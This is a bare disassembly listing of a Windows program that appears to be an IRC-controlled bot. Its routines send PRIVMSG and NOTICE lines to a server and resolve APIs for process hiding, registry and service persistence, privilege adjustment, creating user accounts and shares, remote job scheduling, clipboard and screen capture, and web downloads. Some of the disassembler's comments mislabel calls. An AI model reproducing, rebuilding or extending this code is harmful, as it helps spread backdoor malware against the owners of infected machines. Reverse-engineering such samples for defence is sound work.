Assembly Code of File sub_40751F
sub_404592 proc near ; CODE XREF: sub_40751F + 40�p
; sub_4078FA + 1BB�p ...
var_200 = byte ptr - 200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ ebp + arg_8 ]
push eax
push [ ebp + arg_4 ]
lea eax, [ ebp + var_200 ]
push 200h
push eax
call sub_412E64
lea eax, [ ebp + var_200 ]
add esp, 10h
lea edx, [ eax + 1 ]
loc_4045BF: ; CODE XREF: sub_404592 + 32�j
mov cl, [ eax ]
inc eax
test cl, cl
jnz short loc_4045BF
push 0
sub eax, edx
push eax
lea eax, [ ebp + var_200 ]
push eax
push [ ebp + arg_0 ]
call dword_433534 ; send
leave
retn
sub_404592 endp
########################## SUBROUTINE ##########################
sub_4045DD proc near ; CODE XREF: sub_401000 + B2�p
; sub_4010CA + 61�p ...
var_400 = byte ptr - 400h
var_200 = byte ptr - 200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ ebp + arg_C ], 0
push esi
push edi
mov edi, offset aNotice ; \"NOTICE\"
jnz short loc_4045F8
mov edi, offset aPrivmsg ; \"PRIVMSG\"
loc_4045F8: ; CODE XREF: sub_4045DD + 14�j
mov eax, edi
lea edx, [ eax + 1 ]
loc_4045FD: ; CODE XREF: sub_4045DD + 25�j
mov cl, [ eax ]
inc eax
test cl, cl
jnz short loc_4045FD
sub eax, edx
mov esi, eax
mov eax, [ ebp + arg_4 ]
lea ecx, [ eax + 1 ]
loc_40460E: ; CODE XREF: sub_4045DD + 36�j
mov dl, [ eax ]
inc eax
test dl, dl
jnz short loc_40460E
push [ ebp + arg_8 ]
sub eax, ecx
mov ecx, 1FAh
sub ecx, eax
push offset aS_1 ; \"%s\"
sub ecx, esi
push ecx
lea eax, [ ebp + var_400 ]
push eax
call sub_412E0D
lea eax, [ ebp + var_400 ]
push eax
push [ ebp + arg_4 ]
lea eax, [ ebp + var_200 ]
push edi
push offset aSSS ; \"%s %s :%s\r\n\"
push eax
call sub_412BB5
add esp, 24h
lea eax, [ ebp + var_200 ]
pop edi
lea ecx, [ eax + 1 ]
pop esi
loc_40465F: ; CODE XREF: sub_4045DD + 87�j
mov dl, [ eax ]
inc eax
test dl, dl
jnz short loc_40465F
push 0
sub eax, ecx
push eax
lea eax, [ ebp + var_200 ]
push eax
push [ ebp + arg_0 ]
call dword_433534 ; send
cmp [ ebp + arg_10 ], 0
jz short locret_40468C
push 0FAh
call ds:dword_41F000 ; Sleep
locret_40468C: ; CODE XREF: sub_4045DD + A2�j
leave
retn
sub_4045DD endp ; sp - analysis failed
########################## SUBROUTINE ##########################
sub_40468E proc near ; CODE XREF: sub_40D1EF + 4B�p
push ebx
push ebp
mov ebp, ds:dword_41F078
push esi
push edi
push offset aKernel32_dll ; \"kernel32.dll\"
call ebp ; GetModuleHandleA
mov esi, ds:dword_41F074
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_4047AE
push offset aSeterrormode ; \"SetErrorMode\"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; \"CreateToolhelp32Snapshot\"
push edi
mov dword_433478, eax
call esi ; GetProcAddress
push offset aProcess32first ; \"Process32First\"
push edi
mov dword_433490, eax
call esi ; GetProcAddress
push offset aProcess32next ; \"Process32Next\"
push edi
mov dword_4334EC, eax
call esi ; GetProcAddress
push offset aModule32first ; \"Module32First\"
push edi
mov dword_433450, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; \"GetDiskFreeSpaceExA\"
push edi
mov dword_4334B8, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; \"GetLogicalDriveStringsA\"
push edi
mov dword_43349C, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; \"GetDriveTypeA\"
push edi
mov dword_43353C, eax
call esi ; GetProcAddress
push offset aSearchpatha ; \"SearchPathA\"
push edi
mov dword_43342C, eax
call esi ; GetProcAddress
push offset aQueryperforman ; \"QueryPerformanceCounter\"
push edi
mov dword_4334C0, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; \"QueryPerformanceFrequency\"
push edi
mov dword_4334E4, eax
call esi ; GetProcAddress
cmp dword_433478, ebx
mov dword_433548, eax
jz short loc_40478C
cmp dword_433490, ebx
jz short loc_40478C
cmp dword_4334EC, ebx
jz short loc_40478C
cmp dword_433450, ebx
jz short loc_40478C
cmp dword_43349C, ebx
jz short loc_40478C
cmp dword_43353C, ebx
jz short loc_40478C
cmp dword_43342C, ebx
jz short loc_40478C
cmp dword_4334C0, ebx
jz short loc_40478C
cmp dword_4334E4, ebx
jz short loc_40478C
cmp eax, ebx
jnz short loc_404796
loc_40478C: ; CODE XREF: sub_40468E + B8�j
; sub_40468E + C0�j ...
mov dword_4335F0, 1
loc_404796: ; CODE XREF: sub_40468E + FC�j
push offset aRegisterservic ; \"RegisterServiceProcess\"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_43359C, eax
jz short loc_4047C3
push 1
push ebx
call eax ; GetDiskFreeSpaceExA
jmp short loc_4047C3
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4047AE: ; CODE XREF: sub_40468E + 1D�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_4335F4, eax
mov dword_4335F0, 1
loc_4047C3: ; CODE XREF: sub_40468E + 117�j
; sub_40468E + 11E�j
push offset aUser32_dll ; \"user32.dll\"
call ds:dword_41F070 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40487E
push offset aSendmessagea ; \"SendMessageA\"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; \"FindWindowA\"
push edi
mov dword_433560, eax
call esi ; GetProcAddress
push offset aIswindow ; \"IsWindow\"
push edi
mov dword_4334F8, eax
call esi ; GetProcAddress
push offset aDestroywindow ; \"DestroyWindow\"
push edi
mov dword_433434, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; \"OpenClipboard\"
push edi
mov dword_433498, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; \"GetClipboardData\"
push edi
mov dword_43344C, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; \"CloseClipboard\"
push edi
mov dword_4335CC, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; \"ExitWindowsEx\"
push edi
mov dword_433430, eax
call esi ; GetProcAddress
cmp dword_433560, ebx
mov dword_433538, eax
jz short loc_404889
cmp dword_4334F8, ebx
jz short loc_404889
cmp dword_433434, ebx
jz short loc_404889
cmp dword_433498, ebx
jz short loc_404889
cmp dword_43344C, ebx
jz short loc_404889
cmp dword_4335CC, ebx
jz short loc_404889
cmp dword_433430, ebx
jz short loc_404889
cmp eax, ebx
jnz short loc_404893
jmp short loc_404889
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_40487E: ; CODE XREF: sub_40468E + 144�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_4335FC, eax
loc_404889: ; CODE XREF: sub_40468E + 1B8�j
; sub_40468E + 1C0�j ...
mov dword_4335F8, 1
loc_404893: ; CODE XREF: sub_40468E + 1EC�j
push offset aAdvapi32_dll ; \"advapi32.dll\"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_404A2E
push offset aRegopenkeyexa ; \"RegOpenKeyExA\"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; \"RegCreateKeyExA\"
push edi
mov dword_4335C8, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; \"RegSetValueExA\"
push edi
mov dword_4334E8, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; \"RegQueryValueExA\"
push edi
mov dword_433484, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; \"RegDeleteValueA\"
push edi
mov dword_433460, eax
call esi ; GetProcAddress
push offset aRegclosekey ; \"RegCloseKey\"
push edi
mov dword_4334DC, eax
call esi ; GetProcAddress
cmp dword_4335C8, ebx
mov dword_43357C, eax
jz short loc_40491E
cmp dword_4334E8, ebx
jz short loc_40491E
cmp dword_433484, ebx
jz short loc_40491E
cmp dword_433460, ebx
jz short loc_40491E
cmp dword_4334DC, ebx
jz short loc_40491E
cmp eax, ebx
jnz short loc_404928
loc_40491E: ; CODE XREF: sub_40468E + 26A�j
; sub_40468E + 272�j ...
mov dword_433600, 1
loc_404928: ; CODE XREF: sub_40468E + 28E�j
push offset aOpenprocesstok ; \"OpenProcessToken\"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; \"LookupPrivilegeValueA\"
push edi
mov dword_4335D4, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; \"AdjustTokenPrivileges\"
push edi
mov dword_4335BC, eax
call esi ; GetProcAddress
cmp dword_4335D4, ebx
mov dword_433508, eax
jz short loc_404963
cmp dword_4335BC, ebx
jz short loc_404963
cmp eax, ebx
jnz short loc_40496D
loc_404963: ; CODE XREF: sub_40468E + 2C7�j
; sub_40468E + 2CF�j
mov dword_433600, 1
loc_40496D: ; CODE XREF: sub_40468E + 2D3�j
push offset aOpenscmanagera ; \"OpenSCManagerA\"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; \"OpenServiceA\"
push edi
mov dword_43355C, eax
call esi ; GetProcAddress
push offset aStartservicea ; \"StartServiceA\"
push edi
mov dword_4335D8, eax
call esi ; GetProcAddress
push offset aControlservice ; \"ControlService\"
push edi
mov dword_433564, eax
call esi ; GetProcAddress
push offset aDeleteservice ; \"DeleteService\"
push edi
mov dword_433580, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; \"CloseServiceHandle\"
push edi
mov dword_433494, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; \"EnumServicesStatusA\"
push edi
mov dword_4334D0, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; \"IsValidSecurityDescriptor\"
push edi
mov dword_43356C, eax
call esi ; GetProcAddress
cmp dword_43355C, ebx
mov dword_433598, eax
jz short loc_404A11
cmp dword_4335D8, ebx
jz short loc_404A11
cmp dword_433564, ebx
jz short loc_404A11
cmp dword_433580, ebx
jz short loc_404A11
cmp dword_433494, ebx
jz short loc_404A11
cmp dword_4334D0, ebx
jz short loc_404A11
cmp dword_43356C, ebx
jz short loc_404A11
cmp eax, ebx
jnz short loc_404A1B
loc_404A11: ; CODE XREF: sub_40468E + 34D�j
; sub_40468E + 355�j ...
mov dword_433600, 1
loc_404A1B: ; CODE XREF: sub_40468E + 381�j
push offset aGetusernamea ; \"GetUserNameA\"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_433530, eax
jnz short loc_404A43
jmp short loc_404A39
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_404A2E: ; CODE XREF: sub_40468E + 210�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433604, eax
loc_404A39: ; CODE XREF: sub_40468E + 39E�j
mov dword_433600, 1
loc_404A43: ; CODE XREF: sub_40468E + 39C�j
push offset aGdi32_dll ; \"gdi32.dll\"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_404B0F
push offset aCreatedca ; \"CreateDCA\"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; \"CreateDIBSection\"
push edi
mov dword_4335DC, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; \"CreateCompatibleDC\"
push edi
mov dword_4335B0, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; \"GetDeviceCaps\"
push edi
mov dword_433518, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; \"GetDIBColorTable\"
push edi
mov dword_433510, eax
call esi ; GetProcAddress
push offset aSelectobject ; \"SelectObject\"
push edi
mov dword_433554, eax
call esi ; GetProcAddress
push offset aBitblt ; \"BitBlt\"
push edi
mov dword_43343C, eax
call esi ; GetProcAddress
push offset aDeletedc ; \"DeleteDC\"
push edi
mov dword_433528, eax
call esi ; GetProcAddress
push offset aDeleteobject ; \"DeleteObject\"
push edi
mov dword_4334CC, eax
call esi ; GetProcAddress
cmp dword_4335DC, ebx
mov dword_43351C, eax
jz short loc_404B1A
cmp dword_4335B0, ebx
jz short loc_404B1A
cmp dword_433518, ebx
jz short loc_404B1A
cmp dword_433510, ebx
jz short loc_404B1A
cmp dword_433554, ebx
jz short loc_404B1A
cmp dword_43343C, ebx
jz short loc_404B1A
cmp dword_433528, ebx
jz short loc_404B1A
cmp dword_4334CC, ebx
jz short loc_404B1A
cmp eax, ebx
jnz short loc_404B24
jmp short loc_404B1A
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_404B0F: ; CODE XREF: sub_40468E + 3C0�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43360C, eax
loc_404B1A: ; CODE XREF: sub_40468E + 441�j
; sub_40468E + 449�j ...
mov dword_433608, 1
loc_404B24: ; CODE XREF: sub_40468E + 47D�j
mov ebp, ds:dword_41F070
push offset aWs2_32_dll ; \"ws2_32.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_404DE0
push offset aWsastartup ; \"WSAStartup\"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; \"WSASocketA\"
push edi
mov dword_4334B0, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; \"WSAAsyncSelect\"
push edi
mov dword_433424, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; \"__WSAFDIsSet\"
push edi
mov dword_43352C, eax
call esi ; GetProcAddress
push offset aWsaioctl ; \"WSAIoctl\"
push edi
mov dword_4334F4, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; \"WSAGetLastError\"
push edi
mov dword_433574, eax
call esi ; GetProcAddress
push offset aWsacleanup ; \"WSACleanup\"
push edi
mov dword_433558, eax
call esi ; GetProcAddress
push offset aSocket ; \"socket\"
push edi
mov dword_4335B8, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; \"ioctlsocket\"
push edi
mov dword_4334A0, eax
call esi ; GetProcAddress
push offset aConnect ; \"connect\"
push edi
mov dword_433444, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; \"inet_ntoa\"
push edi
mov dword_433458, eax
call esi ; GetProcAddress
push offset aInet_addr ; \"inet_addr\"
push edi
mov dword_433520, eax
call esi ; GetProcAddress
push offset aHtons ; \"htons\"
push edi
mov dword_433514, eax
call esi ; GetProcAddress
push offset aHtonl ; \"htonl\"
push edi
mov dword_4335EC, eax
call esi ; GetProcAddress
push offset aNtohs ; \"ntohs\"
push edi
mov dword_4335C4, eax
call esi ; GetProcAddress
push offset aNtohl ; \"ntohl\"
push edi
mov dword_433594, eax
call esi ; GetProcAddress
push offset aSend ; \"send\"
push edi
mov dword_433570, eax
call esi ; GetProcAddress
push offset aSendto ; \"sendto\"
push edi
mov dword_433534, eax
call esi ; GetProcAddress
push offset aRecv ; \"recv\"
push edi
mov dword_433470, eax
call esi ; GetProcAddress
push offset aRecvfrom ; \"recvfrom\"
push edi
mov dword_433414, eax
call esi ; GetProcAddress
mov dword_433438, eax
push offset aBind ; \"bind\"
push edi
call esi ; GetProcAddress
push offset aSelect ; \"select\"
push edi
mov dword_433578, eax
call esi ; GetProcAddress
push offset aListen ; \"listen\"
push edi
mov dword_433544, eax
call esi ; GetProcAddress
push offset aAccept ; \"accept\"
push edi
mov dword_4335C0, eax
call esi ; GetProcAddress
push offset aSetsockopt ; \"setsockopt\"
push edi
mov dword_433464, eax
call esi ; GetProcAddress
push offset aGetsockname ; \"getsockname\"
push edi
mov dword_4334BC, eax
call esi ; GetProcAddress
push offset aGethostname ; \"gethostname\"
push edi
mov dword_433418, eax
call esi ; GetProcAddress
push offset aGethostbyname ; \"gethostbyname\"
push edi
mov dword_4335B4, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; \"gethostbyaddr\"
push edi
mov dword_433500, eax
call esi ; GetProcAddress
push offset aGetpeername ; \"getpeername\"
push edi
mov dword_433590, eax
call esi ; GetProcAddress
push offset aClosesocket ; \"closesocket\"
push edi
mov dword_4334E0, eax
call esi ; GetProcAddress
cmp dword_4334B0, ebx
mov dword_4335AC, eax
jz loc_404DEB
cmp dword_433424, ebx
jz loc_404DEB
cmp dword_43352C, ebx
jz loc_404DEB
cmp dword_433574, ebx
jz loc_404DEB
cmp dword_433558, ebx
jz loc_404DEB
cmp dword_4335B8, ebx
jz loc_404DEB
cmp dword_4334A0, ebx
jz loc_404DEB
cmp dword_433444, ebx
jz loc_404DEB
cmp dword_433458, ebx
jz loc_404DEB
cmp dword_433520, ebx
jz loc_404DEB
cmp dword_433514, ebx
jz loc_404DEB
cmp dword_4335EC, ebx
jz loc_404DEB
cmp dword_4335C4, ebx
jz loc_404DEB
cmp dword_433594, ebx
jz short loc_404DEB
cmp dword_433534, ebx
jz short loc_404DEB
cmp dword_433470, ebx
jz short loc_404DEB
cmp dword_433414, ebx
jz short loc_404DEB
cmp dword_433438, ebx
jz short loc_404DEB
cmp dword_433578, ebx
jz short loc_404DEB
cmp dword_433544, ebx
jz short loc_404DEB
cmp dword_4335C0, ebx
jz short loc_404DEB
cmp dword_433464, ebx
jz short loc_404DEB
cmp dword_4334BC, ebx
jz short loc_404DEB
cmp dword_433418, ebx
jz short loc_404DEB
cmp dword_4335B4, ebx
jz short loc_404DEB
cmp dword_433500, ebx
jz short loc_404DEB
cmp dword_433590, ebx
jz short loc_404DEB
cmp eax, ebx
jnz short loc_404DF5
jmp short loc_404DEB
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_404DE0: ; CODE XREF: sub_40468E + 4A7�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433614, eax
loc_404DEB: ; CODE XREF: sub_40468E + 646�j
; sub_40468E + 652�j ...
mov dword_433610, 1
loc_404DF5: ; CODE XREF: sub_40468E + 74E�j
push offset aWininet_dll ; \"wininet.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_404EFA
push offset aInternetgetcon ; \"InternetGetConnectedState\"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; \"InternetGetConnectedStateEx\"
push edi
mov dword_433428, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; \"HttpOpenRequestA\"
push edi
mov dword_4335E8, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; \"HttpSendRequestA\"
push edi
mov dword_4334C8, eax
call esi ; GetProcAddress
push offset aInternetconnec ; \"InternetConnectA\"
push edi
mov dword_4335E4, eax
call esi ; GetProcAddress
push offset aInternetopena ; \"InternetOpenA\"
push edi
mov dword_4334D4, eax
call esi ; GetProcAddress
push offset aInternetopenur ; \"InternetOpenUrlA\"
push edi
mov dword_433448, eax
call esi ; GetProcAddress
push offset aInternetcracku ; \"InternetCrackUrlA\"
push edi
mov dword_4334A8, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; \"InternetReadFile\"
push edi
mov dword_433420, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; \"InternetCloseHandle\"
push edi
mov dword_43354C, eax
call esi ; GetProcAddress
cmp dword_433428, ebx
mov ecx, dword_433448
mov dword_4334FC, eax
jz short loc_404ED6
cmp dword_4335E8, ebx
jz short loc_404ED6
cmp dword_4334C8, ebx
jz short loc_404ED6
cmp dword_4335E4, ebx
jz short loc_404ED6
cmp dword_4334D4, ebx
jz short loc_404ED6
cmp ecx, ebx
jz short loc_404ED6
cmp dword_4334A8, ebx
jz short loc_404ED6
cmp dword_433420, ebx
jz short loc_404ED6
cmp dword_43354C, ebx
jz short loc_404ED6
cmp eax, ebx
jnz short loc_404EE0
loc_404ED6: ; CODE XREF: sub_40468E + 806�j
; sub_40468E + 80E�j ...
mov dword_433618, 1
loc_404EE0: ; CODE XREF: sub_40468E + 846�j
cmp ecx, ebx
jz short loc_404F15
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; \"Mozilla/4.0 (compatible)\"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_4335E0, eax
jnz short loc_404F15
jmp short loc_404F0F
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_404EFA: ; CODE XREF: sub_40468E + 772�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43361C, eax
mov dword_433618, 1
loc_404F0F: ; CODE XREF: sub_40468E + 86A�j
mov dword_4335E0, ebx
loc_404F15: ; CODE XREF: sub_40468E + 854�j
; sub_40468E + 868�j
push offset aIcmp_dll ; \"icmp.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_404F5F
push offset aIcmpcreatefile ; \"IcmpCreateFile\"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; \"IcmpCloseHandle\"
push edi
mov dword_4334F0, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; \"IcmpSendEcho\"
push edi
mov dword_433524, eax
call esi ; GetProcAddress
cmp dword_4334F0, ebx
mov dword_433588, eax
jz short loc_404F6A
cmp dword_433524, ebx
jz short loc_404F6A
cmp eax, ebx
jnz short loc_404F74
jmp short loc_404F6A
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_404F5F: ; CODE XREF: sub_40468E + 892�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433624, eax
loc_404F6A: ; CODE XREF: sub_40468E + 8C1�j
; sub_40468E + 8C9�j ...
mov dword_433620, 1
loc_404F74: ; CODE XREF: sub_40468E + 8CD�j
push offset aNetapi32_dll ; \"netapi32.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40506A
push offset aNetshareadd ; \"NetShareAdd\"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; \"NetShareDel\"
push edi
mov dword_433488, eax
call esi ; GetProcAddress
push offset aNetshareenum ; \"NetShareEnum\"
push edi
mov dword_4334A4, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; \"NetScheduleJobAdd\"
push edi
mov dword_4335A0, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; \"NetApiBufferFree\"
push edi
mov dword_433454, eax
call esi ; GetProcAddress
push offset aNetremotetod ; \"NetRemoteTOD\"
push edi
mov dword_4334D8, eax
call esi ; GetProcAddress
push offset aNetuseradd ; \"NetUserAdd\"
push edi
mov dword_43341C, eax
call esi ; GetProcAddress
push offset aNetuserdel ; \"NetUserDel\"
push edi
mov dword_43346C, eax
call esi ; GetProcAddress
push offset aNetuserenum ; \"NetUserEnum\"
push edi
mov dword_433568, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; \"NetUserGetInfo\"
push edi
mov dword_433480, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; \"NetMessageBufferSend\"
push edi
mov dword_43348C, eax
call esi ; GetProcAddress
cmp dword_433488, ebx
mov dword_4334B4, eax
jz short loc_405075
cmp dword_4334A4, ebx
jz short loc_405075
cmp dword_4335A0, ebx
jz short loc_405075
cmp dword_433454, ebx
jz short loc_405075
cmp dword_4334D8, ebx
jz short loc_405075
cmp dword_43341C, ebx
jz short loc_405075
cmp dword_43346C, ebx
jz short loc_405075
cmp dword_433568, ebx
jz short loc_405075
cmp dword_433480, ebx
jz short loc_405075
cmp dword_43348C, ebx
jz short loc_405075
cmp eax, ebx
jnz short loc_40507F
jmp short loc_405075
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_40506A: ; CODE XREF: sub_40468E + 8F1�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43362C, eax
loc_405075: ; CODE XREF: sub_40468E + 98C�j
; sub_40468E + 994�j ...
mov dword_433628, 1
loc_40507F: ; CODE XREF: sub_40468E + 9D8�j
push offset aDnsapi_dll ; \"dnsapi.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4050B4
push offset aDnsflushresolv ; \"DnsFlushResolverCache\"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; \"DnsFlushResolverCacheEntry_A\"
push edi
mov dword_433584, eax
call esi ; GetProcAddress
cmp dword_433584, ebx
mov dword_433504, eax
jz short loc_4050BF
cmp eax, ebx
jnz short loc_4050C9
jmp short loc_4050BF
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4050B4: ; CODE XREF: sub_40468E + 9FC�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433634, eax
loc_4050BF: ; CODE XREF: sub_40468E + A1E�j
; sub_40468E + A24�j
mov dword_433630, 1
loc_4050C9: ; CODE XREF: sub_40468E + A22�j
push offset aIphlpapi_dll ; \"iphlpapi.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4050FE
push offset aGetipnettable ; \"GetIpNetTable\"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; \"DeleteIpNetEntry\"
push edi
mov dword_4334AC, eax
call esi ; GetProcAddress
cmp dword_4334AC, ebx
mov dword_43350C, eax
jz short loc_405109
cmp eax, ebx
jnz short loc_405113
jmp short loc_405109
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4050FE: ; CODE XREF: sub_40468E + A46�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43363C, eax
loc_405109: ; CODE XREF: sub_40468E + A68�j
; sub_40468E + A6E�j
mov dword_433638, 1
loc_405113: ; CODE XREF: sub_40468E + A6C�j
push offset aMpr_dll ; \"mpr.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_405172
push offset aWnetaddconnect ; \"WNetAddConnection2A\"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; \"WNetAddConnection2W\"
push edi
mov dword_433540, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; \"WNetCancelConnection2A\"
push edi
mov dword_4335D0, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; \"WNetCancelConnection2W\"
push edi
mov dword_43347C, eax
call esi ; GetProcAddress
cmp dword_433540, ebx
mov dword_433440, eax
jz short loc_40517D
cmp dword_4335D0, ebx
jz short loc_40517D
cmp dword_43347C, ebx
jz short loc_40517D
cmp eax, ebx
jnz short loc_405187
jmp short loc_40517D
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_405172: ; CODE XREF: sub_40468E + A90�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433644, eax
loc_40517D: ; CODE XREF: sub_40468E + ACC�j
; sub_40468E + AD4�j ...
mov dword_433640, 1
loc_405187: ; CODE XREF: sub_40468E + AE0�j
push offset aShell32_dll ; \"shell32.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4051BC
push offset aShellexecutea ; \"ShellExecuteA\"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; \"SHChangeNotify\"
push edi
mov dword_4335A8, eax
call esi ; GetProcAddress
cmp dword_4335A8, ebx
mov dword_433474, eax
jz short loc_4051C7
cmp eax, ebx
jnz short loc_4051D1
jmp short loc_4051C7
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4051BC: ; CODE XREF: sub_40468E + B04�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43364C, eax
loc_4051C7: ; CODE XREF: sub_40468E + B26�j
; sub_40468E + B2C�j
mov dword_433648, 1
loc_4051D1: ; CODE XREF: sub_40468E + B2A�j
push offset aOdbc32_dll ; \"odbc32.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40525A
push offset aSqldriverconne ; \"SQLDriverConnect\"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; \"SQLSetEnvAttr\"
push edi
mov dword_43358C, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; \"SQLExecDirect\"
push edi
mov dword_43345C, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; \"SQLAllocHandle\"
push edi
mov dword_4335A4, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; \"SQLFreeHandle\"
push edi
mov dword_4334C4, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; \"SQLDisconnect\"
push edi
mov dword_433550, eax
call esi ; GetProcAddress
cmp dword_43358C, ebx
mov dword_433468, eax
jz short loc_405265
cmp dword_43345C, ebx
jz short loc_405265
cmp dword_4335A4, ebx
jz short loc_405265
cmp dword_4334C4, ebx
jz short loc_405265
cmp dword_433550, ebx
jz short loc_405265
cmp eax, ebx
jnz short loc_40526F
jmp short loc_405265
